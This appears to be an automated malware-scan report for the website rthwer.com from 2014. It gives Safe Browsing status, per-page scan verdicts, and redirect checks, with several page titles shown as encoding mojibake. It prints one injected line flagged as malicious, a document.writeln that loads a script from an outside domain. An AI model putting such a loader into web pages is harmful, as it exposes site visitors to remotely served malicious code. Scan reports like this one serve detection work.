Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rthwer.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rthwer.com/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:28:59 GMT Accept-Ranges: bytes ETag: "50db7af2f0c7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 17871 Content-Location: http://rthwer.com/index.html Content-Type: text/html Last-Modified: Thu, 04 Sep 2014 03:33:09 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/index.html | 200 OK Content-Length: 17871 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: cnjiahe.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title>
<meta name="keywords" content="ÑÇÖÝÅ®ÓÅ,»Ø¼ÒÉ«×ÛºÏÍø"/>
<meta name="description" content="ÑÇÖÝÅ®ÓŹٷ½ÍøÌṩÃâ·ÑµÇ½ ...[4484 bytes skipped]... | ||
http://rthwer.com/common.js | 200 OK Content-Length: 96 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: js.lwtzdec.com document.writeln("<SCRIPT language=javascript src=\"http://js.lwtzdec.com/zy.js\"></SCRIPT>");
Decoded script: <SCRIPT language=javascript src="http://js.lwtzdec.com/zy.js"></SCRIPT> | ||
http://rthwer.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://rthwer.com/nwsngys/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:02 GMT Accept-Ranges: bytes ETag: "1c48fb1abc7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12876 Content-Location: http://rthwer.com/nwsngys/index.html Content-Type: text/html Last-Modified: Wed, 03 Sep 2014 19:17:24 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/nwsngys/index.html | 200 OK Content-Length: 12876 Content-Type: text/html | clean |
http://rthwer.com/mgavdyw/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:03 GMT Accept-Ranges: bytes ETag: "321e46b1abc7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12986 Content-Location: http://rthwer.com/mgavdyw/index.html Content-Type: text/html Last-Modified: Wed, 03 Sep 2014 19:17:24 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/mgavdyw/index.html | 200 OK Content-Length: 12986 Content-Type: text/html | clean |
http://rthwer.com/avttyz/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:05 GMT Accept-Ranges: bytes ETag: "92f81fb1abc7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12752 Content-Location: http://rthwer.com/avttyz/index.html Content-Type: text/html Last-Modified: Wed, 03 Sep 2014 19:17:24 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/avttyz/index.html | 200 OK Content-Length: 12752 Content-Type: text/html | clean |
http://rthwer.com/yzstbdbdbdbdbd/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:06 GMT Accept-Ranges: bytes ETag: "62b33b1abc7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 13184 Content-Location: http://rthwer.com/yzstbdbdbdbdbd/index.html Content-Type: text/html Last-Modified: Wed, 03 Sep 2014 19:17:24 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/yzstbdbdbdbdbd/index.html | 200 OK Content-Length: 13184 Content-Type: text/html | clean |
http://rthwer.com/kbrbmnxz/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 12:29:08 GMT Accept-Ranges: bytes ETag: "565352f2f0c7cf1:949a" Server: Microsoft-IIS/6.0 Content-Length: 12947 Content-Location: http://rthwer.com/kbrbmnxz/index.html Content-Type: text/html Last-Modified: Thu, 04 Sep 2014 03:33:08 GMT X-Powered-By: ASP.NET | clean |
http://rthwer.com/kbrbmnxz/index.html | 200 OK Content-Length: 12947 Content-Type: text/html | clean |
http://rthwer.com/kbrbmnxz/76820140904.html | 200 OK Content-Length: 11631 Content-Type: text/html | clean |
http://rthwer.com/nwsngys/55920140827.html | 200 OK Content-Length: 11558 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wzbiwei.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>Òç³öÍæζÍâÃæÅÜwww.11aabb.comÆð¾«Á¦·Åµ½½â¾ö×ʽðÉÏ_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="www.11aabb.com"/> & ...[4579 bytes skipped]... | ||
http://rthwer.com/avttyz/55620140823.html | 200 OK Content-Length: 11859 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: bxyhsteel.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>»ØÈ¥½è¿îʲôʱºò³¯Àï×ßÎÒÏàÐÅ_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="¿ì²¥Ôõô²¥·Å²»ÁË"/> <meta name="descr ...[4553 bytes skipped]... | ||
http://rthwer.com/nwsngys/2820140823.html | 200 OK Content-Length: 11136 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fsw1688.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¸Ð¾õ¼¸ºõÀÓ½øºÚ»¢¶ÓÐåÇòÅ×¾ü¶Ó_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="³ÉÈË°æÐÔ"/> <meta name="description" ...[4578 bytes skipped]... | ||
http://rthwer.com/mgavdyw/1320140823.html | 200 OK Content-Length: 10830 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wwtaiqiu.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÎÒÐÁ¿àÎÒÄÐÈ˵ÄÊ®´óÃûÆ÷ͼè÷ÃÎ_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="ÄÐÈ˵ÄÊ®´óÃûÆ÷ͼ"/> <meta name="descr ...[4550 bytes skipped]... | ||
http://rthwer.com/mgavdyw/33020140823.html | 200 OK Content-Length: 11102 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: sgzl18.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÊÂÇéÉëÒ÷ÉùÊʺϴò·É»úµÄÊÓƵ±¦±´_ÑÇÖÝÅ®ÓÅ_»Ø¼ÒÉ«×ÛºÏÍø¡¾2014È«¼¯¡¿</title> <meta name="keywords" content="Êʺϴò·É»úµÄÊÓƵ"/> <meta name="de ...[4551 bytes skipped]... | ||
http://rthwer.com/kbrbmnxz/5520140825.html | 200 OK Content-Length: 10963 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rthwer.com
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 12:28:59 GMT
Accept-Ranges: bytes
ETag: "50db7af2f0c7cf1:949a"
Server: Microsoft-IIS/6.0
Content-Length: 17871
Content-Location: http://rthwer.com/index.html
Content-Type: text/html
Last-Modified: Thu, 04 Sep 2014 03:33:09 GMT
X-Powered-By: ASP.NET
...17871 bytes of data.
GET / HTTP/1.1
Host: rthwer.com
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 12:28:59 GMT
Accept-Ranges: bytes
ETag: "50db7af2f0c7cf1:949a"
Server: Microsoft-IIS/6.0
Content-Length: 17871
Content-Location: http://rthwer.com/index.html
Content-Type: text/html
Last-Modified: Thu, 04 Sep 2014 03:33:09 GMT
X-Powered-By: ASP.NET
...17871 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rthwer.com
Referer: http://www.google.com/search?q=rthwer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rthwer.com
Referer: http://www.google.com/search?q=rthwer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.